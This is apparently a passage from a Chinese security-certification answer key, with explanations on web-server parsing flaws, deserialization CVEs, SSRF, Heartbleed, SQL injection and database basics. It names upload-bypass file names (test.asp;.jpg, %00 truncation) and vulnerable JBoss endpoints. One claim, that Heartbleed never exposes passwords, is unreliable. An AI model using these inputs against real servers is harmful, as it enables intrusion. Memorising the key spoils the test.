自动安装更新系统后台下载并安装。下载但手动安装用户选择时间重启。仅通知用户需主动下载。禁用更新需通过组策略或注册表实现。 26. IIS6.x解析漏洞利用方式有哪些(1.5分)
✅ A. 文件名如test.asp;.jpg
✅ D. 文件夹如/upload/test.asp/1.jpg
❌ B. 默认类型名IIS6无此机制
❌ C. 默认扩展名与漏洞无关 解析
分号截断test.asp;.jpg 被解析为ASP文件。目录解析/asp目录/1.jpg 被当作ASP执行。 修复建议禁用非必要脚本映射升级至IIS7。 22. Websphere Java反序列化CVE-2015-7450漏洞影响版本有(1.5分)
✅ A. 8.5版
✅ B. 8.5.5传统和自由
✅ C. 8.0版
✅ D. 7.0版 解析
CVE-2015-7450影响WebSphere Application Server 7.0、8.0、8.5及Liberty Profile。
漏洞机制Apache Commons Collections库反序列化漏洞。修复方案升级至Fix Pack 8.5.5.9或应用官方补丁。 23. JBoss反序列化漏洞说法正确的是(1.5分)
✅ C. JBoss4.x访问/jbossmq-httpil/HTTPServerILServlet存在漏洞
✅ D. JBoss5.x/6.x访问/invoker/readonly返回500可能存在漏洞
❌ A. JMX Invoker漏洞需关闭jmx-invoker-service.xml
❌ B. WLS Security漏洞属于WebLogic非JBoss 解析
JBoss反序列化漏洞 4.x版本/jbossmq-httpil/HTTPServerILServlet未授权访问可执行任意代码。5.x/6.x版本/invoker/readonly接口反序列化漏洞CVE-2017-12149。 修复建议删除或限制访问高危接口升级至EAP 7。 20. 下面哪个是对SSRF的防御(1.5分)
✅ A. 限制IP禁止内网IP请求
✅ B. 限制端口仅允许80/443
✅ C. 过滤返回信息避免敏感数据泄露
❌ D. 过滤POST参数SSRF通常通过URL触发 解析
SSRF防御策略
协议白名单仅允许HTTP/HTTPS。目标限制禁止访问内网IP和非常用端口。响应过滤屏蔽错误信息中的内网拓扑数据。 21. 关于漏洞修复以下说法正确的是(1.5分)
✅ A. 高稳定性环境需综合评估修复优先级
✅ B. 修复可能影响业务连续性
❌ C. 极高危漏洞必须修复不可忽略
❌ D. Linux无需频繁升级仍需定期更新 解析
漏洞修复原则
风险评估结合CVSS评分、资产价值、利用可能性排序。测试验证生产环境需在测试环境验证补丁兼容性。备份回滚修复前备份系统制定回滚方案。 17. 关于OpenSSL心脏出血漏洞修复说法正确的是(1.5分)
✅ C. 升级后需生成新密钥原密钥可能泄露
✅ D. 升级至最新版本可解决
❌ A. 旧密钥可继续使用存在被窃取风险
❌ B. 用户需改密漏洞泄露内存数据非密码 解析
HeartbleedCVE-2014-0160修复步骤
升级OpenSSL至1.0.1g或1.0.2。吊销旧证书并重新签发。重启服务确保新版本生效。 18. IIS中间件文件上传漏洞利用方式有哪些(1.5分)
✅ A. 目录解析a.asp/ 下任意文件解析为ASP
✅ D. 分号截断test.asp;.jpg
❌ B. 路径后加.phpIIS6不支持PHP解析
❌ C. 路径前加/php无实际意义 解析
IIS6解析漏洞 文件夹解析/asp_dir/1.jpg 被当作ASP执行。分号截断test.asp;.jpg 忽略分号后内容。 修复方案禁用非必要脚本映射使用URL重写过滤异常请求。
39. WebLogic密码复杂度配置
✅ A. 控制台修改“最小口令长度”
✅ D. 依据weblogic.system.minPasswordLen8 解析
正确配置路径WebLogic管理控制台中通过【安全领域】→【DefaultAuthenticator】→【提供程序特定】设置密码策略如最小长度。配置文件密码策略通常存储在config.xml 或领域配置中而非weblogic.properties 。基线依据weblogic.system.minPasswordLen8 是常见安全基线参数需通过脚本或控制台生效。 30. 触发解析漏洞的操作
✅ A. xxx.jpg%00.php 空字节截断
✅ B. xxx.jpg/1.php 路径解析
✅ C. xxx.asp;.jpg 分号截断IIS 6.0
✅ D. test.php.php123 畸形后缀Apache多后缀解析 原理
空字节截断利用%00截断后续字符如a.jpg%00.php 被解析为.php。路径解析Apache将a.jpg/1.php 视为PHP文件执行。分号截断IIS 6.0将a.asp;.jpg 解析为.asp。多后缀解析Apache可能将a.php.jpg 解析为PHP文件。 27. MySQL 5.0以上与以下版本注入差异
✅ C. 5.0以下无information_schema需暴力跑表名 关键区别
MySQL ≥5.0默认包含information_schema系统库可直接查询数据库、表、列名。MySQL 5.0无此系统库需通过字典爆破或盲注猜测表名。其他选项多用户操作模式与版本无关属干扰项。 28. Linux可读取的分区类型
✅ A. ext3原生支持
✅ B. FAT16需vfat驱动
✅ C. FAT32同FAT16需挂载
✅ D. NTFS需ntfs-3g驱动 说明
ext3/4Linux默认文件系统直接读写。FAT/NTFS需内核模块或第三方工具支持如ntfs-3g。 23. Oracle物理组件
✅ A. 控制文件
✅ C. 日志文件
✅ D. 数据文件 物理结构
控制文件存储数据库元数据如数据文件位置。日志文件记录事务变更Redo Log。数据文件存储实际数据表、索引。管理后台属逻辑组件如Oracle Enterprise Manager。